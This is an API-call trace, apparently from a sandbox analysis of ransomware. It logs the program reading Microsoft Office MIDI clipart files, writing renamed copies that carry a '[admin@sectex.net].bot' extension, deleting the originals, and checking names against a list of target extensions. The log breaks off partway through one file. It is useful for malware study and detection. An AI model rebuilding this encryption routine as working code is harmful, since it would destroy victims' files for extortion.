	[0140.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.519] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.519] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0140.520] GetLastError () returned 0x0
	[0140.520] ReadFile (in: hFile=0x3a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x215a, lpOverlapped=0x0) returned 1
	[0140.521] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x2160, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x2160, lpOverlapped=0x0) returned 1
	[0140.522] ReadFile (in: hFile=0x3a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.522] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.523] SetEndOfFile (hFile=0x384) returned 1
	[0140.523] CloseHandle (hObject=0x384) returned 1
	[0140.523] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.523] SetEndOfFile (hFile=0x3a0) returned 1
	[0140.612] CloseHandle (hObject=0x3a0) returned 1
	[0140.612] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.626] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid")) returned 1
	[0140.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63
	[0140.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63
	[0140.631] lstrlenW (lpString=".doc") returned 4
	[0140.631] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.631] lstrlenW (lpString=".docx") returned 5
	[0140.631] lstrcmpiW (lpString1=".docx", lpString2="3.MID") returned -1
	[0140.631] lstrlenW (lpString=".pdf") returned 4
	[0140.631] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.631] lstrlenW (lpString=".xls") returned 4
	[0140.631] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.631] lstrlenW (lpString=".xlsx") returned 5
	[0140.631] lstrcmpiW (lpString1=".xlsx", lpString2="3.MID") returned -1
	[0140.631] lstrlenW (lpString=".ppt") returned 4
	[0140.632] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63
	[0140.632] lstrlenW (lpString=".zip") returned 4
	[0140.632] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.632] lstrlenW (lpString=".rar") returned 4
	[0140.632] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.632] lstrlenW (lpString=".bz2") returned 4
	[0140.632] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.632] lstrlenW (lpString=".7z") returned 3
	[0140.632] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63
	[0140.632] lstrlenW (lpString=".dbf") returned 4
	[0140.632] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63
	[0140.632] lstrlenW (lpString=".1cd") returned 4
	[0140.632] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63
	[0140.632] lstrlenW (lpString=".jpg") returned 4
	[0140.632] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63
	[0140.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63
	[0140.632] lstrlenW (lpString=".doc") returned 4
	[0140.632] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.632] lstrlenW (lpString=".docx") returned 5
	[0140.632] lstrcmpiW (lpString1=".docx", lpString2="3.MID") returned -1
	[0140.632] lstrlenW (lpString=".pdf") returned 4
	[0140.632] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.632] lstrlenW (lpString=".xls") returned 4
	[0140.632] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.632] lstrlenW (lpString=".xlsx") returned 5
	[0140.632] lstrcmpiW (lpString1=".xlsx", lpString2="3.MID") returned -1
	[0140.632] lstrlenW (lpString=".ppt") returned 4
	[0140.632] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63
	[0140.633] lstrlenW (lpString=".zip") returned 4
	[0140.633] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.633] lstrlenW (lpString=".rar") returned 4
	[0140.633] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.633] lstrlenW (lpString=".bz2") returned 4
	[0140.633] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.633] lstrlenW (lpString=".7z") returned 3
	[0140.633] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63
	[0140.633] lstrlenW (lpString=".dbf") returned 4
	[0140.633] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63
	[0140.633] lstrlenW (lpString=".1cd") returned 4
	[0140.633] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63
	[0140.633] lstrlenW (lpString=".jpg") returned 4
	[0140.633] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.633] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.633] lstrlenW (lpString="PARNT_04.MID") returned 12
	[0140.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0140.634] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=6070) returned 1
	[0140.634] CloseHandle (hObject=0x388) returned 1
	[0140.634] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid")) returned 0x20
	[0140.634] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.635] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0140.635] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.635] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.635] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0140.635] GetLastError () returned 0x0
	[0140.635] ReadFile (in: hFile=0x388, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x17b6, lpOverlapped=0x0) returned 1
	[0140.637] WriteFile (in: hFile=0x3a4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x17c0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x17c0, lpOverlapped=0x0) returned 1
	[0140.638] ReadFile (in: hFile=0x388, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.638] WriteFile (in: hFile=0x3a4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.638] SetEndOfFile (hFile=0x3a4) returned 1
	[0140.638] CloseHandle (hObject=0x3a4) returned 1
	[0140.639] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.639] SetEndOfFile (hFile=0x388) returned 1
	[0140.641] CloseHandle (hObject=0x388) returned 1
	[0140.641] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.642] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid")) returned 1
	[0140.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63
	[0140.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63
	[0140.642] lstrlenW (lpString=".doc") returned 4
	[0140.642] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.642] lstrlenW (lpString=".docx") returned 5
	[0140.642] lstrcmpiW (lpString1=".docx", lpString2="4.MID") returned -1
	[0140.642] lstrlenW (lpString=".pdf") returned 4
	[0140.642] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.642] lstrlenW (lpString=".xls") returned 4
	[0140.642] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.642] lstrlenW (lpString=".xlsx") returned 5
	[0140.642] lstrcmpiW (lpString1=".xlsx", lpString2="4.MID") returned -1
	[0140.642] lstrlenW (lpString=".ppt") returned 4
	[0140.642] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63
	[0140.643] lstrlenW (lpString=".zip") returned 4
	[0140.643] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.643] lstrlenW (lpString=".rar") returned 4
	[0140.643] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.643] lstrlenW (lpString=".bz2") returned 4
	[0140.643] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.643] lstrlenW (lpString=".7z") returned 3
	[0140.643] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63
	[0140.643] lstrlenW (lpString=".dbf") returned 4
	[0140.643] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63
	[0140.643] lstrlenW (lpString=".1cd") returned 4
	[0140.643] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63
	[0140.643] lstrlenW (lpString=".jpg") returned 4
	[0140.643] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63
	[0140.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63
	[0140.643] lstrlenW (lpString=".doc") returned 4
	[0140.643] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.643] lstrlenW (lpString=".docx") returned 5
	[0140.643] lstrcmpiW (lpString1=".docx", lpString2="4.MID") returned -1
	[0140.643] lstrlenW (lpString=".pdf") returned 4
	[0140.643] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.643] lstrlenW (lpString=".xls") returned 4
	[0140.643] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.643] lstrlenW (lpString=".xlsx") returned 5
	[0140.643] lstrcmpiW (lpString1=".xlsx", lpString2="4.MID") returned -1
	[0140.643] lstrlenW (lpString=".ppt") returned 4
	[0140.643] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63
	[0140.643] lstrlenW (lpString=".zip") returned 4
	[0140.644] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.644] lstrlenW (lpString=".rar") returned 4
	[0140.644] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.644] lstrlenW (lpString=".bz2") returned 4
	[0140.644] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.644] lstrlenW (lpString=".7z") returned 3
	[0140.644] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63
	[0140.644] lstrlenW (lpString=".dbf") returned 4
	[0140.644] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63
	[0140.644] lstrlenW (lpString=".1cd") returned 4
	[0140.644] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63
	[0140.644] lstrlenW (lpString=".jpg") returned 4
	[0140.644] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.644] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.644] lstrlenW (lpString="PARNT_05.MID") returned 12
	[0140.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0140.645] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=6020) returned 1
	[0140.645] CloseHandle (hObject=0x388) returned 1
	[0140.645] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid")) returned 0x20
	[0140.645] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0140.646] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.646] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.646] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0140.649] GetLastError () returned 0x0
	[0140.649] ReadFile (in: hFile=0x388, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x1784, lpOverlapped=0x0) returned 1
	[0140.651] WriteFile (in: hFile=0x3a4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x1790, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x1790, lpOverlapped=0x0) returned 1
	[0140.652] ReadFile (in: hFile=0x388, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.652] WriteFile (in: hFile=0x3a4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.652] SetEndOfFile (hFile=0x3a4) returned 1
	[0140.652] CloseHandle (hObject=0x3a4) returned 1
	[0140.652] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.652] SetEndOfFile (hFile=0x388) returned 1
	[0140.655] CloseHandle (hObject=0x388) returned 1
	[0140.655] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.655] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid")) returned 1
	[0140.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63
	[0140.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63
	[0140.656] lstrlenW (lpString=".doc") returned 4
	[0140.656] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.656] lstrlenW (lpString=".docx") returned 5
	[0140.656] lstrcmpiW (lpString1=".docx", lpString2="5.MID") returned -1
	[0140.656] lstrlenW (lpString=".pdf") returned 4
	[0140.656] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.656] lstrlenW (lpString=".xls") returned 4
	[0140.656] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.656] lstrlenW (lpString=".xlsx") returned 5
	[0140.656] lstrcmpiW (lpString1=".xlsx", lpString2="5.MID") returned -1
	[0140.657] lstrlenW (lpString=".ppt") returned 4
	[0140.657] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63
	[0140.657] lstrlenW (lpString=".zip") returned 4
	[0140.657] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.657] lstrlenW (lpString=".rar") returned 4
	[0140.657] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.657] lstrlenW (lpString=".bz2") returned 4
	[0140.657] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.657] lstrlenW (lpString=".7z") returned 3
	[0140.657] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63
	[0140.657] lstrlenW (lpString=".dbf") returned 4
	[0140.657] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63
	[0140.657] lstrlenW (lpString=".1cd") returned 4
	[0140.657] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63
	[0140.657] lstrlenW (lpString=".jpg") returned 4
	[0140.657] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63
	[0140.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63
	[0140.657] lstrlenW (lpString=".doc") returned 4
	[0140.657] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.657] lstrlenW (lpString=".docx") returned 5
	[0140.657] lstrcmpiW (lpString1=".docx", lpString2="5.MID") returned -1
	[0140.657] lstrlenW (lpString=".pdf") returned 4
	[0140.657] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.658] lstrlenW (lpString=".xls") returned 4
	[0140.658] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.658] lstrlenW (lpString=".xlsx") returned 5
	[0140.658] lstrcmpiW (lpString1=".xlsx", lpString2="5.MID") returned -1
	[0140.658] lstrlenW (lpString=".ppt") returned 4
	[0140.658] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63
	[0140.658] lstrlenW (lpString=".zip") returned 4
	[0140.658] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.658] lstrlenW (lpString=".rar") returned 4
	[0140.658] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.658] lstrlenW (lpString=".bz2") returned 4
	[0140.658] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.658] lstrlenW (lpString=".7z") returned 3
	[0140.658] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63
	[0140.658] lstrlenW (lpString=".dbf") returned 4
	[0140.658] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63
	[0140.658] lstrlenW (lpString=".1cd") returned 4
	[0140.658] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63
	[0140.658] lstrlenW (lpString=".jpg") returned 4
	[0140.658] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.658] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.658] lstrlenW (lpString="PARNT_06.MID") returned 12
	[0140.658] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0140.659] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=7768) returned 1
	[0140.659] CloseHandle (hObject=0x388) returned 1
	[0140.659] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid")) returned 0x20
	[0140.659] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0140.659] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
